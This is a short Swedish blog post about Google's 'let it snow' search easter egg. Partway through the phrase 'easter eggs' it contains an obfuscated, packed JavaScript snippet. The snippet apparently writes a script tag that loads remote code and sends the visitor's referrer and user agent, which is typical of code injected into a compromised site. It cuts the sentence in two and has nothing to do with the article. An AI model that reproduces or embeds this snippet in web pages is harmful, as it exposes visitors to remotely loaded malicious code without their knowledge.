Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

Det snöar på Google…

Det snöar på Google…
Filip Urde
  • On 18 december, 2011
  • http://www.revue.se/filip-urde

Som vanligt hos kreativa Google så kommer man på lite roliga ”easter eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|akrdz|var|u0026u|referrer|aehbb||js|php’.split(’|’),0,{}))
eggs”
som du kan skriva in och på så sätt manipulera Google.

Nu är det snart jul, vilket folket på Google inte missat. Högtiden till ära så har man gjort en ny funktion. Genom att skriva in ”let it snow” i Googles sökfält så börjar det helt enkelt att snö. Vilket är trevligt! i alla fall för oss i Stockholm som får idagsläget stå ut med någon from av monsun/blask snö…

Google.com